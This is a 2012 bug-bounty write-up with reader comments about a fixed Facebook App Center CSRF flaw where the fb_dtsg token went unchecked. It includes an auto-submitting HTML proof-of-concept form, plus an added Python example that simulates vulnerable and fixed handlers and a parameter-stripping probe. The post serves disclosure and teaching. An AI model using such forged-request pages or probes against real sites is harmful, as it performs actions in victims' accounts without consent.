Sunday, 19 August 2012

Facebook CSRF worth USD 5000

This post is about a Cross-Site Request Forgery (CSRF) bug in Facebook that I recently reported and that has now been fixed. One day, when I logged into Facebook, I noticed a new feature, "Appcenter". It lets you pick the apps you want; game apps like FarmVille are the most popular there.

I had worked on apps before, so I decided to give this new feature a shot. Clicking the "Play Game" button on a game app generated the following POST request:


POST /connect/uiserver.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800


This feature adds many new parameters. 'fb_dtsg' is the anti-CSRF token, 'perms' holds the permissions the app requests, and 'redirect_uri' and 'app_id' are app-specific values. The remaining parameters looked static, except for 'new_perms' and 'orig_perms'. I started to play with these two dynamic parameters, and after a few attempts I found that they were not needed at all to add an app.

An anti-CSRF token like 'fb_dtsg' is supposed to be validated server-side: the server must compare the submitted value against the one bound to the user's session, not merely accept a request that carries it. I was shocked to see that in this new feature the developer had somehow missed this point, and it was possible to add an app without sending 'fb_dtsg' at all. Bang!!
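To make the server-side point concrete, here is an added example (not code from this post or from Facebook): a simulated handler for the request above in its vulnerable form, where fb_dtsg is read but never compared, beside a fixed form that binds the token to the session, together with the parameter-stripping loop used above (drop one field, replay, keep the drop if the action still succeeds) to find which fields the endpoint actually needs. The handler logic, session store, status codes and field list are assumptions modelled on the parameters the post lists; the only real value is the app_id from the PoC.

```python
"""Added example, not from the original post or from Facebook.

Simulates the permissions.request handler behind /connect/uiserver.php in
a vulnerable and a fixed form, and runs the parameter-minimisation loop a
tester uses to learn which fields (and whether the anti-CSRF token) are
actually checked. Everything below is an assumption except the field names
and app_id taken from the post's PoC form.
"""
import hmac
import secrets

# Constructed session for the logged-in victim. "dtsg" is the per-session
# token the page embeds in the fb_dtsg form field.
SESSION = {"user": "victim", "dtsg": secrets.token_hex(8), "apps": set()}

# Fields from the post's PoC form (values as shown there). new_perms and
# orig_perms are absent because the author found they were not needed.
POC_FIELDS = {
    "perms": "",
    "dubstep": "1",
    "new_user_session": "1",
    "grant_clicked": "Play+Game",
    "send_to_mobile_redirect_uri": "",
    "app_id": "2389801228",
    "redirect_uri": "",
    "app_center": "1",
    "is_paid_app": "",
    "app_center_ref": "appcenter",
    "response_type": "none",
    "from_post": "1",
    "__uiserv_method": "permissions.request",
}


def vulnerable_handler(session, form):
    """Models the bug: the token is read if present but never compared,
    so a cross-site form post without fb_dtsg is accepted."""
    _token = form.get("fb_dtsg")  # read, then ignored: the actual defect
    if form.get("__uiserv_method") != "permissions.request":
        return 400
    if not form.get("app_id") or form.get("grant_clicked") is None:
        return 400
    session["apps"].add(form["app_id"])  # the app is added to the account
    return 200


def fixed_handler(session, form):
    """Hardened form: the token must be present and must equal the one bound
    to this session. compare_digest avoids a timing side channel."""
    token = form.get("fb_dtsg")
    if not token or not hmac.compare_digest(token, session["dtsg"]):
        return 403
    return vulnerable_handler(session, form)


def minimise(handler, session, form):
    """Greedy parameter stripping: for each field, replay the request without
    it and keep the drop if the action still succeeds. Returns the names the
    handler really requires. Order-dependent, as any greedy search is."""
    required = dict(form)
    for name in list(form):
        trial = {k: v for k, v in required.items() if k != name}
        session["apps"].clear()
        if handler(session, trial) == 200:
            required = trial
    session["apps"].clear()
    return set(required)


if __name__ == "__main__":
    full = dict(POC_FIELDS, fb_dtsg=SESSION["dtsg"])
    print("vulnerable, no token:", vulnerable_handler(SESSION, POC_FIELDS))
    print("fixed, no token:     ", fixed_handler(SESSION, POC_FIELDS))
    print("vulnerable needs:", sorted(minimise(vulnerable_handler, SESSION, full)))
    print("fixed needs:     ", sorted(minimise(fixed_handler, SESSION, full)))
```

Against the vulnerable handler the minimiser strips fb_dtsg along with every other cosmetic field, which is exactly the signal that the token is decorative; against the fixed handler fb_dtsg survives the loop. In a real test the same loop replays each trial against the live endpoint with the victim's cookies, which the simulated handler stands in for here.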

The final PoC for this CSRF looks like this (an auto-submitting form with no fb_dtsg field at all):

<body onload="document.forms[0].submit();">
<!-- The form action was left blank in the original post; the request it
     replays is the POST /connect/uiserver.php shown above. -->
<form action="" method="POST">
        <input type="hidden" name="perms" value="" />
        <input type="hidden" name="dubstep" value="1" />
        <input type="hidden" name="new_user_session" value="1" />
        <input type="hidden" name="grant_clicked" value="1" />
        <input type="hidden" name="send_to_mobile_redirect_uri" value="" />
        <input type="hidden" name="app_id" value="2389801228" />
        <input type="hidden" name="redirect_uri" value="" />
        <input type="hidden" name="app_center" value="1" />
        <input type="hidden" name="is_paid_app" value="" />
        <input type="hidden" name="app_center_ref" value="appcenter" />
        <input type="hidden" name="response_type" value="none" />
        <input type="hidden" name="from_post" value="1" />
        <input type="hidden" name="__uiserv_method" value="permissions.request" />
        <!-- grant_clicked appears twice in the original PoC; both values are posted. -->
        <input type="hidden" name="grant_clicked" value="Play+Game" />
</form>
</body>

The same endpoint served other app categories as well, such as music apps and developer apps, so the CSRF was not limited to games. The Facebook Security team awarded this bug $5000.

Facebook was pretty fast to address this issue and resolved it the very next day. I'm very thankful to the Facebook Security Team.


  1. "Anti-CSRF tokens like 'fb_dtsg' are supposed to get validated at server-side. I was shocked to see that in this new feature, somehow the developer missed this point and it was possible to add an app without 'fb_dtsg'. Bang!!"

    Awesome find, mate!!

  2. Congrats buddy. You are awesome as usual. :)

  3. Congrats bro. Awesome finding. :)

  4. Guy, you're a genius because you TRIED it. I always believed that FB/Twitter are not that stupid to skip token verification. But now, HAHAHA.

    P.S. I love CSRF.

  5. +1 on Egor's post. I would have thought "nah, if they check that token on five scripts, they check it on every script" :D
    Nice find, and enjoy your additional month's salary ;)

    Did you try to find an exploit by hand or use an automatic tool?

  6. Thanks everyone.
    @Egor, I think it was my lucky time. Btw, your work on CSRF is great.
    @archi, mostly I do it manually with FF add-ons.

  7. Well done, really impressive.

    Keep the good work up!